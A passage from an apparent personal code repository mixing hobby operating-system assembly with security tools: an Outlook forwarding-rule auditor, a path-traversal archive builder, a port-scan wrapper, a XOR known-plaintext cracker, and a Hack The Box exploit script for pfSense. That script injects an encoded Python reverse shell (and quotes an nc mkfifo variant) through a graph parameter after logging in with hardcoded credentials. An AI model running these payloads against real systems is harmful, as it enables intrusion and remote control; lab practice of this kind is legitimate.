64 | mov dl, [disk]
65 | mov si, DAP
66 | mov ah, 0x42
67 | int 0x13
68 | jc .print_error
69 | ret
70 | .print_error:
71 | mov si, disk_error_message
72 | call Real_mode_println
73 | .halt: hlt
74 | jmp .halt; Infinite loop. We cannot recover from disk error.
75 |
--------------------------------------------------------------------------------
/outlook/get_outlook_forwarding_rules.ps1:
--------------------------------------------------------------------------------
1 | #Requires -version 2.0
2 | #Author: Alamot
3 | Add-Type -AssemblyName microsoft.office.interop.outlook
4 | $outlook = New-Object -ComObject outlook.application
5 | $namespace = $Outlook.GetNameSpace("mapi")
6 |
7 |
8 | # See https://docs.microsoft.com/en-us/office/vba/api/outlook.olruleactiontype
9 | $ACTIONS_TO_GRAB = @(6, 7, 8)
10 | # 6 => olRuleActionForward
11 | # 7 => olRuleActionForwardAsAttachment
12 | # 8 => olRuleActionRedirect
13 |
14 |
15 | [Hashtable[]]$records = $null
16 |
17 | ForEach ($store in $namespace.Stores) {
18 |
19 | $records += @{}
20 | $records[-1]['CurrentUser'] = $namespace.CurrentUser.Name
21 | $records[-1]['DisplayName'] = $store.DisplayName
22 | $records[-1]['FilePath'] = $store.FilePath
23 | $records[-1]['Rules'] = $()
24 |
25 | $rules = $store.GetRules()
26 |
27 | ForEach ($rule in $rules) {
28 |
29 | if ($rule.Enabled) {
30 |
31 | $actions_to_grab_found = 0
32 | ForEach ($action in $rule.Actions) {
33 | if ($action.Enabled -and ($ACTIONS_TO_GRAB -contains $action.ActionType)) {
34 | $actions_to_grab_found = 1
35 | }
36 | }
37 |
38 | if ($actions_to_grab_found -eq 1) {
39 |
40 | $records[-1]['Rules'] += , @{}
41 | $records[-1]['Rules'][-1]['name'] = $rule.Name
42 | $records[-1]['Rules'][-1]['conditions'] = @()
43 | $records[-1]['Rules'][-1]['actions'] = @()
44 |
45 | ForEach ($condition in $rule.Conditions) {
46 | if ($condition.Enabled) {
47 | # https://docs.microsoft.com/en-us/office/vba/api/outlook.olruleconditiontype
48 | $s = "type:" + $condition.ConditionType.toString()
49 | if ("Text" -in $condition.PSobject.Properties.Name) {
50 | $s += ", text:" + $condition.Text;
51 | }
52 | if ("Recipients" -in $condition.PSobject.Properties.Name) {
53 | $s += ", recipients:" +
54 | (($condition.Recipients | select -expand Name) -join ';')
55 | }
56 | $records[-1]['Rules'][-1]['conditions'] += , $s
57 | }
58 | }
59 |
60 | ForEach ($action in $rule.Actions) {
61 | if ($action.Enabled -and ($ACTIONS_TO_GRAB -contains $action.ActionType)) {
62 | $s = "type:" + $action.ActionType.toString() + ", recipients:" +
63 | (($action.Recipients | select -expand Name) -join ';')
64 | $records[-1]['Rules'][-1]["actions"] += , $s
65 | }
66 | }
67 |
68 | }
69 |
70 | }
71 | }
72 | }
73 |
74 |
75 | $records | ConvertTo-Json -Depth 10
76 |
77 | # Uncomment the following lines and set the proper path to write the output into a file
78 | # $outfile = join-path -path "\\Tcom2\shared" -childpath $($env:COMPUTERNAME + "-" + $(Get-Date -UFormat "%Y-%m-%d") + ".json")
79 | # $records | ConvertTo-Json -Depth 10 | Set-Content $outfile
80 |
--------------------------------------------------------------------------------
/path_traversal/path_traversal_archiver.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Author: Alamot
3 | import os
4 | import sys
5 | import zipfile
6 | import tarfile
7 | import argparse
8 |
9 |
10 | mode = {".zip":"a", ".jar":"a", ".war":"a", ".apk":"a",
11 | ".tar":"a", ".gz":"w:gz", ".tgz":"w:gz", ".bz2":"w:bz2"}
12 |
13 |
14 | def make_traversal_path(path, level=0, os="unix"):
15 | if os == "win":
16 | traversal = ".." + "\\"
17 | fullpath = traversal*level + path
18 | return fullpath.replace('/', '\\').replace('\\\\', '\\')
19 | else:
20 | traversal = ".." + "/"
21 | fullpath = traversal*level + path
22 | return fullpath.replace('\\', '/').replace('//', '/')
23 |
24 |
25 | def main():
26 | parser = argparse.ArgumentParser(description="A tool to create archives " +
27 | "containing path-traversal filenames (e.g. '../../etc/passwd').")
28 | parser.add_argument("file_to_add", help="File to add in the archive.")
29 | parser.add_argument("archive",
30 | help="Archive filename (Supported extensions are " +
31 | ".zip, .jar, .war, .apk, " +
32 | ".tar, .tar.bz2, .tar.gz, .tgz).")
33 | parser.add_argument("-l", "--levels", dest="levels", default="0-10",
34 | help="A single level or a range of levels to " +
35 | "traverse (default: %(default)s).")
36 | parser.add_argument("-o", "--os", dest="os", default="unix",
37 | help="Target OS [unix|win] (default: %(default)s).")
38 | parser.add_argument("-p", "--path", dest="path", default="",
39 | help="Path to include (e.g. 'etc/').")
40 | args = parser.parse_args()
41 |
42 | if not os.path.exists(args.file_to_add):
43 | sys.exit("Cannot find input file: " + args.file_to_add)
44 |
45 | name, ext = os.path.splitext(args.archive)
46 | if not ext:
47 | sys.exit("Please specify a supported extention (zip, jar, " +
48 | "tar, tar.bz2, tar.gz, tgz) in the archive filename: " +
49 | args.archive)
50 |
51 | try:
52 | if "-" not in args.levels:
53 | start = int(args.levels)
54 | end = int(args.levels) + 1
55 | else:
56 | start, end = args.levels.split("-")
57 | start = int(start)
58 | end = int(end) + 1
59 | except ValueError:
60 | sys.exit("Please specify a single level (e.g. 3) or " +
61 | "a level range (e.g. 1-10) for path traversal.")
62 |
63 | path = args.path + os.path.basename(args.file_to_add)
64 |
65 | if ext in [".zip", ".jar", ".war", ".apk"]:
66 | print("Creating archive " + args.archive)
67 | zipf = zipfile.ZipFile(args.archive, mode[ext])
68 | for i in range(start, end):
69 | fullpath = make_traversal_path(path, level=i, os=args.os)
70 | print("[+] Adding " + fullpath)
71 | zipf.write(args.file_to_add, fullpath)
72 | zipf.close()
73 | elif ext in [".tar", ".bz2", ".gz", ".tgz"]:
74 | print("Creating archive " + args.archive)
75 | tarf = tarfile.open(args.archive, mode[ext])
76 | for i in range(start, end):
77 | fullpath = make_traversal_path(path, level=i, os=args.os)
78 | print("[+] Adding " + fullpath)
79 | tarf.add(args.file_to_add, fullpath)
80 | tarf.close()
81 | else:
82 | sys.exit("Extention '" + ext + "' not supported.")
83 |
84 |
85 | if __name__ == '__main__':
86 | main()
87 |
--------------------------------------------------------------------------------
/enum/htbscan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Author: Alamot
3 | import argparse
4 | import re
5 | import subprocess
6 | import sys
7 |
8 |
9 | def run_command(command):
10 | print("\nRunning command: "+' '.join(command))
11 | sp = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
12 | output = ""
13 | while True:
14 | out = sp.stdout.read(1).decode('utf-8')
15 | if out == '' and sp.poll() != None:
16 | break
17 | if out != '':
18 | output += out
19 | sys.stdout.write(out)
20 | sys.stdout.flush()
21 | return output
22 |
23 |
24 | def enum(ip, ports, max_rate, outfile=None):
25 | # Running masscan
26 | cmd = ["sudo", "masscan", "-e", "tun0", "-p" + ports,
27 | "--max-rate", str(max_rate), "--interactive", ip]
28 | output = run_command(cmd)
29 | if outfile:
30 | for line in output.splitlines():
31 | if "rate:" not in line: # Don't write 'rate:' lines
32 | outfile.write(line + "\n")
33 | outfile.flush()
34 |
35 | # Get discovered TCP ports from the masscan output, sort them and run nmap for those
36 | results = re.findall('port (\d*)/tcp', output)
37 | if results:
38 | tcp_ports = list({int(port) for port in results})
39 | tcp_ports.sort()
40 | tcp_ports = ''.join(str(tcp_ports)[1:-1].split())
41 | # Running nmap
42 | cmd = ["sudo", "nmap", "-A", "-p"+tcp_ports, ip]
43 | output = run_command(cmd)
44 | if outfile:
45 | outfile.write(output)
46 | outfile.flush()
47 |
48 | # Get discovered UDP ports from the masscan output, sort them and run nmap for those
49 | results = re.findall('port (\d*)/udp', output)
50 | if results:
51 | udp_ports = list({int(port) for port in results})
52 | udp_ports.sort()
53 | udp_ports = ''.join(str(udp_ports)[1:-1].split())
54 | # Running nmap
55 | cmd = ["sudo", "nmap", "-A", "-sU", "-p"+udp_ports, ip]
56 | output = run_command(cmd)
57 | if outfile:
58 | outfile.write(output)
59 | outfile.flush()
60 |
61 |
62 | def main():
63 | parser = argparse.ArgumentParser(description="Port/Service enumaration tool.")
64 | parser.add_argument("IP", help="IP address to scan.")
65 | parser.add_argument("-tp", "--tcp-ports", dest="tcp_ports", default="1-65535", help="List of ports/port ranges to scan (TCP only).")
66 | parser.add_argument("-up", "--udp-ports", dest="udp_ports", default="1-65535", help="List of ports/port ranges to scan (UDP only).")
67 | parser.add_argument("-r", "--max-rate", dest="max_rate", default=500, type=int, help="Send packets no faster than per second")
68 | parser.add_argument("-o", "--output", dest="outfile", help="File to write output to.")
69 | args = parser.parse_args()
70 |
71 | # Construct ports string
72 | ports = ""
73 | tcp = args.tcp_ports and args.tcp_ports.lower() not in ["0", "None"]
74 | udp = args.udp_ports and args.udp_ports.lower() not in ["0", "None"]
75 | if tcp:
76 | ports += args.tcp_ports
77 | if tcp and udp:
78 | ports += ","
79 | if udp:
80 | ports += "U:" + args.udp_ports
81 |
82 | # Write to file?
83 | if args.outfile:
84 | with open(args.outfile, "at") as outfile:
85 | enum(args.IP, ports, args.max_rate, outfile)
86 | else:
87 | enum(args.IP, ports, args.max_rate)
88 |
89 |
90 | if __name__ == "__main__":
91 | main()
92 |
--------------------------------------------------------------------------------
/raspberry_pi_os/part1/boot.S:
--------------------------------------------------------------------------------
1 | // A 64-bit (AArch64) kernel for the Raspberry Pi.
2 | // Author: Alamot
3 |
4 | /******************************************************************************/
5 | /* A note of caution */
6 | /******************************************************************************/
7 | /* When programming in ARM AArch64 assembly, it is important to exercise */
8 | /* caution regarding both control flow and data alignment. */
9 | /* */
10 | /* Unlike x86, where the return address is automatically pushed onto the */
11 | /* stack by the CALL instruction, ARM uses the link register (x30 aka lr) */
12 | /* to store the return address. This means that each BL (Branch with Link) */
13 | /* overwrites the previous value of x30. If a function makes another BL call */
14 | /* without first saving the content of the link register (for example, */
15 | /* by pushing it onto the stack), the original return address will be lost */
16 | /* forever, causing return to a wrong place. */
17 | /* */
18 | /* Be also mindful of data alignment requirements when accessing memory. */
19 | /* Many load and store instructions require the addresses to be aligned to */
20 | /* specific boundaries (e.g. LDHR (Load halfword) needs a 2-byte alignment). */
21 | /* Misaligned accesses can cause alignment faults or degrade performance. */
22 | /* Ensuring proper alignment of data structures and using alignment */
23 | /* directives (.aling) where necessary helps maintain both correctness and */
24 | /* efficiency. */
25 | /******************************************************************************/
26 |
27 |
28 | /*---Initialized-data---------------------------------------------------------*/
29 | .section ".rodata" // Read only data section
30 | .align 2 // ARM instructions needs proper data alignment otherwise they fault.
31 | hello_msg: .short 14 // The length of the string (16 bits).
32 | .ascii "Hello, world!\n" // We don't use null-terminated strings.
33 |
34 | /*---Code---------------------------------------------------------------------*/
35 | .section ".text"
36 | .global _start
37 | _start:
38 | /* Read this CPU core's ID */
39 | mrs x1, MPIDR_EL1 // Read Multiprocessor Affinity Register.
40 | and x1, x1, #3 // Mask to get just the CPU ore ID (0-3).
41 | cbz x1, core0 // If ID is 0, branch to core0.
42 | b halt // If not Core 0, put it to sleep.
43 |
44 | core0:
45 | ldr x1, =__stack_top
46 | mov sp, x1 // We set our stack pointer to __stack_top address
47 | mov x2, 5 // Counter = 5 (i.e. send the message five times)
48 | main:
49 | ldr x20, =hello_msg // Load the address of the message into x20
50 | bl uart_puts // Send the message to UART
51 | subs x2, x2, #1 // Decrease counter
52 | bne main // Loop until length counter = 0
53 | halt: /* Infinite loop. */
54 | wfe // Wait For Event: This is a low-power sleep/halt instruction.
55 | b halt // It prevents us from going off in memory and executing junk.
56 |
57 |
58 | /*---Uninitialized-data-------------------------------------------------------*/
59 | .section ".bss" // Allocate uninitialized space (in linker.ld) for the stack.
60 |
61 |
--------------------------------------------------------------------------------
/crypto/xorknown.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2
2 | # Author: Alamot
3 | # This is a XOR plaintext attack tool: If we know a part of the plaintext maybe
4 | # we can recover the key and the whole text.
5 | from __future__ import print_function
6 | from __future__ import division
7 | import string, sys
8 |
9 |
10 | ignore_code = 0xff
11 | printable_key = True
12 | max_key_length = 21
13 |
14 |
15 | def is_printable(text, ignore_code):
16 | ''' Function to check if every character in text is printable '''
17 | for ch in text:
18 | if ord(ch) == ignore_code:
19 | continue
20 | if ch not in string.printable:
21 | return False
22 | return True
23 |
24 |
25 | def lrotate(s, d):
26 | ''' Function to rotate string left by d length '''
27 | return s[d:] + s[0:d]
28 |
29 |
30 | if len(sys.argv) < 2 or sys.argv[1].strip().lower() == "--help":
31 | print("Known-plaintext attack:\n"+sys.argv[0]+" [max_key_length]")
32 | print("\nDecrypt using known key:\n"+sys.argv[0]+" --key=the_known_key")
33 | exit()
34 |
35 | filename = sys.argv[1]
36 |
37 | if sys.argv[2].strip().lower()[:5] == "--key":
38 | known_key = sys.argv[2].strip()[6:]
39 | with open(filename, "rb") as f:
40 | data = f.read()
41 | decrypted_text = ""
42 | repeated_key = (known_key)*((len(data) // len(known_key)) + 1)
43 | for x in range(len(data)):
44 | decrypted_text += chr(ord(data[x]) ^ ord(repeated_key[x]))
45 | print("Key length: "+str(len(known_key)), "\nPartial Key: "+known_key, "\nPlaintext: "+decrypted_text)
46 | exit()
47 | else:
48 | known_plaintext = sys.argv[2]
49 |
50 | if len(known_plaintext) > max_key_length:
51 | print("The length of the known plaintext is greater than max_key_length (="+str(max_key_length)+"). Please give a smaller plaintext or incrase max_key_length.")
52 | exit()
53 |
54 | if len(sys.argv) > 3:
55 | max_key_length = int(sys.argv[3])+1
56 |
57 | with open(filename, "rb") as f:
58 | data = f.read()
59 |
60 | print("Searching XOR-encrypted "+filename+" for string '"+known_plaintext+"' (max_key_length = "+str(max_key_length-1)+")")
61 |
62 | try:
63 | for i in range(len(data)-len(known_plaintext)): # Try known plaintext in every position
64 | partial_key = ""
65 | for j in range(len(known_plaintext)):
66 | if known_plaintext[j] == ignore_code:
67 | partial_key += chr(ignore_code)
68 | else:
69 | partial_key += chr(ord(data[i+j]) ^ ord(known_plaintext[j]))
70 | #print("Single key: "+partial_key)
71 | if is_printable(partial_key, ignore_code) or not printable_key:
72 | for n in range(len(partial_key), max_key_length): # Try different key lengths
73 | for m in range(n): # Try different partial key positions
74 | expanded_key = lrotate(partial_key+chr(ignore_code)*(n-len(partial_key)), m)
75 | #print(expanded_key, m)
76 | repeated_key = (expanded_key)*((len(data) // len(expanded_key)) + 1)
77 | decrypted_text = ""
78 | for x in range(len(data)): # Try to decrypt the encoded text
79 | if ord(repeated_key[x]) == ignore_code:
80 | decrypted_text += chr(ignore_code)
81 | else:
82 | decrypted_text += chr(ord(data[x]) ^ ord(repeated_key[x]))
83 | if is_printable(decrypted_text, ignore_code): # Is the whole result printable?
84 | if known_plaintext in decrypted_text:
85 | print("Key length: "+str(len(expanded_key)), "\nPartial Key: "+expanded_key, "\nPlaintext: "+decrypted_text)
86 | print("")
87 | except KeyboardInterrupt:
88 | print("\nCtrl+C received. Exiting...")
89 | exit()
90 |
--------------------------------------------------------------------------------
/os/part4/kernel/kernel.asm:
--------------------------------------------------------------------------------
1 | BITS 64 ; We have entered the long mode! :)
2 |
3 | ;---Define----------------------------------------------------------------------
4 | %define DATA_SEG 0x0010
5 |
6 | ;---Initialized data------------------------------------------------------------
7 | hello_world_message dw 12
8 | db 'Hello World!'
9 | ticks_message dw 20
10 | db 'System timer ticks: '
11 | scancode_message dw 20
12 | db 'Keyboard scan code: '
13 | task1_message dw 6
14 | db "Task 1"
15 | task2_message dw 6
16 | db "Task 2"
17 | task3_message dw 6
18 | db "Task 3"
19 |
20 | ;---Include---------------------------------------------------------------------
21 | %include "kernel/video.asm"
22 | %include "kernel/idt.asm"
23 | %include "kernel/isr.asm"
24 | %include "kernel/tasking.asm"
25 |
26 | ;---Code------------------------------------------------------------------------
27 | Kernel:
28 | lidt [IDTR] ; Load our IDTR
29 |
30 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC.
31 | out PIC1_DATA, al
32 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC.
33 | out PIC2_DATA, al
34 |
35 | ; Set all segments registers to DATA_SEG.
36 | mov ax, DATA_SEG
37 | mov ds, ax
38 | mov es, ax
39 | mov fs, ax
40 | mov gs, ax
41 | mov ss, ax
42 |
43 | ; Clear the screen.
44 | mov rax, 0x0020002000200020 ; Set background color to black (0) and
45 | ; character to blank space (20).
46 | call Fill_screen
47 |
48 | ; Print "Hello World!" at the upper right corner.
49 | mov ah, 0x1E
50 | mov r8, 69
51 | mov r9, 1
52 | mov rsi, hello_world_message
53 | call Print
54 |
55 | ; Initialize general stack allocation to the current rsp value.
56 | mov [stack_allocation], rsp
57 |
58 | ; Create three tasks.
59 | mov rsi, Task1
60 | call Create_task
61 | mov rsi, Task2
62 | call Create_task
63 | mov rsi, Task3
64 | call Create_task
65 |
66 | ; Set active the first task slot
67 | mov qword [active_task_slot], 0
68 |
69 | ; Task 1: We print system timer ticks and keyboard scan code.
70 | Task1:
71 | mov ah, (VGA_COLOR_DARK_GREY << 4) | VGA_COLOR_WHITE
72 | mov r8, 1
73 | mov r9, 2
74 | mov rsi, task1_message
75 | Call Print
76 | mov r8, 1
77 | mov r9, 3
78 | mov rsi, ticks_message
79 | Call Print
80 | mov r8, 1
81 | mov r9, 4
82 | mov rsi, scancode_message
83 | Call Print
84 | .loop:
85 | ; Print system timer ticks.
86 | mov r8, 21
87 | mov r9, 3
88 | mov r10, [systimer_ticks]
89 | call Print_hex
90 | ; Print keyboard scan code.
91 | mov r8, 21
92 | mov r9, 4
93 | mov r10, [keyboard_scancode]
94 | call Print_hex
95 | jmp Task1.loop
96 |
97 | ; Task 2: We set r10 to 0 and we increase it by one in a loop.
98 | Task2:
99 | mov ah, (VGA_COLOR_GREEN << 4) | VGA_COLOR_WHITE
100 | mov r8, 1
101 | mov r9, 6
102 | mov rsi, task2_message
103 | Call Print
104 | mov r8, 1
105 | mov r9, 7
106 | mov r10, 0
107 | .loop:
108 | inc r10
109 | ; Print number of ticks
110 | Call Print_hex
111 | jmp Task2.loop
112 |
113 | ; Task 3: We set r10 to 0xFFFFFFFFFFFFFFFF and we decrease it by one in a loop.
114 | Task3:
115 | mov ah, (VGA_COLOR_MAGENTA << 4) | VGA_COLOR_WHITE
116 | mov r8, 1
117 | mov r9, 9
118 | mov rsi, task3_message
119 | Call Print
120 | mov r8, 1
121 | mov r9, 10
122 | mov r10, 0xFFFFFFFFFFFFFFFF
123 | .loop:
124 | dec r10
125 | ; Print number of ticks
126 | Call Print_hex
127 | jmp Task3.loop
128 |
--------------------------------------------------------------------------------
/hacking/HTB/Sense/autopwn_sense.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2
2 | # Author: Alamot (Antonios Tsolis)
3 | import re
4 | import sys
5 | import time
6 | from pwn import *
7 | import signal, thread
8 | import requests, urllib3
9 | signal.signal(signal.SIGINT, signal.SIG_DFL)
10 |
11 | DEBUG = False
12 | RHOST="10.10.10.60"
13 | RPORT=443
14 | LHOST="10.10.14.5"
15 | LPORT=60001
16 |
17 | if DEBUG:
18 | context.log_level = 'debug'
19 | else:
20 | context.log_level = 'info'
21 |
22 | def send_ptyshell_payload():
23 | #stager = "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc " + str(LHOST) + " " + str(LPORT) + " > /tmp/f"
24 | stager = "python -c \"import os, pty, socket; lhost = '"+ str(LHOST) + "'; lport = " + str(LPORT) + "; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv('HISTFILE','/dev/null'); pty.spawn('/bin/sh'); s.close(); exit()\""
25 | encoded_stager = ""
26 | for c in stager:
27 | encoded_stager += "\\\\%03d" %(int(oct(ord(c))))
28 | time.sleep(1)
29 |
30 | client = None
31 | try:
32 | urllib3.disable_warnings()
33 | client = requests.session()
34 | client.verify = False
35 | client.keep_alive = False
36 |
37 | # Retrieve the CSRF token first
38 | p1=log.progress("Connecting to get csrf token")
39 | response = client.get("https://"+str(RHOST)+":"+str(RPORT), timeout=20)
40 | if response.status_code != 200:
41 | p1.failure("Status "+str(response.status_code))
42 | sys.exit()
43 | csrf = re.search('csrfMagicToken\s*=\s*"(sid:\w+,\d+)', response.text).group(1)
44 | p1.success("csrfMagicToken = " + csrf)
45 |
46 | # Login
47 | p2=log.progress("Logging in")
48 | data={"__csrf_magic":csrf, "usernamefld":"rohit", "passwordfld":"pfsense", "login":"Login"}
49 | response = client.post("https://"+str(RHOST)+":"+str(RPORT)+"/index.php", data=data, timeout=20)
50 | if response.status_code != 200:
51 | p1.failure("Status "+str(response.status_code))
52 | sys.exit()
53 | p2.success("Status "+str(response.status_code))
54 |
55 | # Send payload
56 | p3=log.progress("Sending pty shell payload...")
57 | try:
58 | params={"database":"-throughput.rrd", "graph":"file|printf "+encoded_stager+"|sh|echo "}
59 | response = client.get("https://"+str(RHOST)+":"+str(RPORT)+"/status_rrd_graph_img.php", params=params, timeout=20)
60 | if response.status_code != 200:
61 | p3.failure("Status "+str(response.status_code))
62 | sys.exit()
63 | except requests.exceptions.Timeout as e:
64 | p3.success("OK")
65 |
66 | except requests.exceptions.RequestException as e:
67 | log.failure(str(e))
68 |
69 | finally:
70 | if client:
71 | client.close()
72 | log.success("Web thread exited successfully.")
73 |
74 | try:
75 | threading.Thread(target=send_ptyshell_payload).start()
76 | except Exception as e:
77 | log.error(str(e))
78 | ptyshell = listen(LPORT, timeout=20).wait_for_connection()
79 | if ptyshell.sock is None:
80 | log.failure("Connection timeout.")
81 | sys.exit()
82 | ptyshell.interactive()
83 | sys.exit()
84 |
85 | '''
86 | https://10.0.0.145/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
87 |
88 | https://10.0.0.145/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20
89 |
90 | GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\156\\143\\040\\061\\060\\056\\061\\060\\056\\061\\064\\056\\061\\066\\060\\040\\066\\060\\060\\060\\060\\040\\074\\040\\057\\150\\157\\155\\145\\057\\162\\157\\150\\151\\164\\057\\165\\163\\145\\162\\056\\164\\170\\164
91 | |sh|echo%20 HTTP/1.1
92 | Host: 10.0.0.145
93 | Accept: */*
94 | Accept-Language: en
95 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
96 | Cookie: PHPSESSID=28530634f9c99cd400bd73b28b812482
97 | Connection: close
98 | '''
99 |
--------------------------------------------------------------------------------
/os/part3/stage2/paging.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Define----------------------------------------------------------------------
4 | %define PAGE_PRESENT (1 << 0)
5 | %define PAGE_WRITE (1 << 1)
6 | %define CODE_SEG 0x0008
7 | %define PAGING_DATA 0x9000
8 |
9 | ;---Initialized data------------------------------------------------------------
10 |
11 | ;****************************************************************************************;
12 | ; Global Descriptor Table (GDT) ;
13 | ;****************************************************************************************;
14 | ; The Global Descriptor Table (GDT) is a data structure used by x86-family processors ;
15 | ; (starting with the 80286) in order to define the characteristics of the various memory ;
16 | ; areas (segments) used during program execution, including the base address, the size, ;
17 | ; and access privileges like executability and writability. ;
18 | ;****************************************************************************************;
19 | GDT:
20 | .Null:
21 | dq 0x0000000000000000 ; Null Descriptor (should be present).
22 | .Code:
23 | dq 0x00209A0000000000 ; 64-bit code descriptor (exec/read).
24 | dq 0x0000920000000000 ; 64-bit data descriptor (read/write).
25 | ALIGN 4
26 | dw 0 ; Padding (to make the "address of the GDT" field aligned on a 4-byte boundary).
27 | .Pointer:
28 | dw $ - GDT - 1 ; 16-bit Size (Limit) of GDT.
29 | dd GDT ; 32-bit Base Address of GDT. (CPU will zero extend to 64-bit)
30 |
31 |
32 | ;---Code------------------------------------------------------------------------
33 | Prepare_paging:
34 | ;*******************************************************************************************;
35 | ; Prepare paging ;
36 | ;-------------------------------------------------------------------------------------------;
37 | ; ES:EDI Should point to a valid page-aligned 16KiB buffer, for the PML4, PDPT, PD and a PT.;
38 | ; SS:ESP Should point to memory that can be used as a small (1 uint32_t) stack. ;
39 | ;*******************************************************************************************;
40 | mov edi, PAGING_DATA ; Point edi to a free space to create the paging structures.
41 |
42 | ; Zero out the 16KiB buffer. Since we are doing a rep stosd, count should be bytes/4.
43 | push di ; REP STOSD alters DI.
44 | mov ecx, 0x1000
45 | xor eax, eax
46 | cld
47 | rep stosd
48 | pop di ; Get DI back.
49 |
50 | ; Build the Page Map Level 4. ES:DI points to the Page Map Level 4 table.
51 | lea eax, [es:di + 0x1000] ; EAX = Address of the Page Directory Pointer Table.
52 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag).
53 | mov [es:di], eax ; Store the value of EAX as the first PML4E.
54 |
55 | ; Build the Page Directory Pointer Table.
56 | lea eax, [es:di + 0x2000] ; Put the address of the Page Directory in to EAX.
57 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag).
58 | mov [es:di + 0x1000], eax ; Store the value of EAX as the first PDPTE.
59 |
60 | ; Build the Page Directory.
61 | lea eax, [es:di + 0x3000] ; Put the address of the Page Table in to EAX.
62 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag).
63 | mov [es:di + 0x2000], eax ; Store to value of EAX as the first PDE.
64 |
65 | push di ; Save DI for the time being.
66 | lea di, [di + 0x3000] ; Point DI to the page table.
67 | mov eax, PAGE_PRESENT | PAGE_WRITE ; Move the flags into EAX - and point it to 0x0000.
68 |
69 | ; Build the Page Table.
70 | .LoopPageTable:
71 | mov [es:di], eax
72 | add eax, 0x1000
73 | add di, 8
74 | cmp eax, 0x200000 ; If we did all 2MiB, end.
75 | jb .LoopPageTable
76 |
77 | pop di ; Restore DI.
78 | ret
79 |
--------------------------------------------------------------------------------
/os/part4/stage2/paging.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Define----------------------------------------------------------------------
4 | %define PAGE_PRESENT (1 << 0)
5 | %define PAGE_WRITE (1 << 1)
6 | %define CODE_SEG 0x0008
7 | %define PAGING_DATA 0xF000
8 |
9 | ;---Initialized data------------------------------------------------------------
10 |
11 | ;****************************************************************************************;
12 | ; Global Descriptor Table (GDT) ;
13 | ;****************************************************************************************;
14 | ; The Global Descriptor Table (GDT) is a data structure used by x86-family processors ;
15 | ; (starting with the 80286) in order to define the characteristics of the various memory ;
16 | ; areas (segments) used during program execution, including the base address, the size, ;
17 | ; and access privileges like executability and writability. ;
18 | ;****************************************************************************************;
19 | GDT:
20 | .Null:
21 | dq 0x0000000000000000 ; Null Descriptor (should be present).
22 | .Code:
23 | dq 0x00209A0000000000 ; 64-bit code descriptor (exec/read).
24 | dq 0x0000920000000000 ; 64-bit data descriptor (read/write).
25 | ALIGN 4
26 | dw 0 ; Padding (to make the "address of the GDT" field aligned on a 4-byte boundary).
27 | .Pointer:
28 | dw $ - GDT - 1 ; 16-bit Size (Limit) of GDT.
29 | dd GDT ; 32-bit Base Address of GDT. (CPU will zero extend to 64-bit)
30 |
31 |
32 | ;---Code------------------------------------------------------------------------
33 | Prepare_paging:
34 | ;*******************************************************************************************;
35 | ; Prepare paging ;
36 | ;-------------------------------------------------------------------------------------------;
37 | ; ES:EDI Should point to a valid page-aligned 16KiB buffer, for the PML4, PDPT, PD and a PT.;
38 | ; SS:ESP Should point to memory that can be used as a small (1 uint32_t) stack. ;
39 | ;*******************************************************************************************;
40 | mov edi, PAGING_DATA ; Point edi to a free space to create the paging structures.
41 |
42 | ; Zero out the 16KiB buffer. Since we are doing a rep stosd, count should be bytes/4.
43 | push di ; REP STOSD alters DI.
44 | mov ecx, 0x1000
45 | xor eax, eax
46 | cld
47 | rep stosd
48 | pop di ; Get DI back.
49 |
50 | ; Build the Page Map Level 4. ES:DI points to the Page Map Level 4 table.
51 | lea eax, [es:di + 0x1000] ; EAX = Address of the Page Directory Pointer Table.
52 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag).
53 | mov [es:di], eax ; Store the value of EAX as the first PML4E.
54 |
55 | ; Build the Page Directory Pointer Table.
56 | lea eax, [es:di + 0x2000] ; Put the address of the Page Directory in to EAX.
57 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag).
58 | mov [es:di + 0x1000], eax ; Store the value of EAX as the first PDPTE.
59 |
60 | ; Build the Page Directory.
61 | lea eax, [es:di + 0x3000] ; Put the address of the Page Table in to EAX.
62 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag).
63 | mov [es:di + 0x2000], eax ; Store to value of EAX as the first PDE.
64 |
65 | push di ; Save DI for the time being.
66 | lea di, [di + 0x3000] ; Point DI to the page table.
67 | mov eax, PAGE_PRESENT | PAGE_WRITE ; Move the flags into EAX - and point it to 0x0000.
68 |
69 | ; Build the Page Table.
70 | .LoopPageTable:
71 | mov [es:di], eax
72 | add eax, 0x1000
73 | add di, 8
74 | cmp eax, 0x200000 ; If we did all 2MiB, end.
75 | jb .LoopPageTable
76 |
77 | pop di ; Restore DI.
78 | ret
79 |
--------------------------------------------------------------------------------
/os/part3/kernel/isr.asm:
--------------------------------------------------------------------------------
1 | ; INTERRUPT SERVICE ROUTINES
2 |
3 | BITS 64
4 |
5 | ;---Initialized data----------------------------------------------------------
6 | systimer_ticks dq 0
7 | keyboard_scancode dq 0
8 | error_code_low dw 0
9 | error_code_high dw 0
10 |
11 | int_message dw 17
12 | db 'Interrupt raised!'
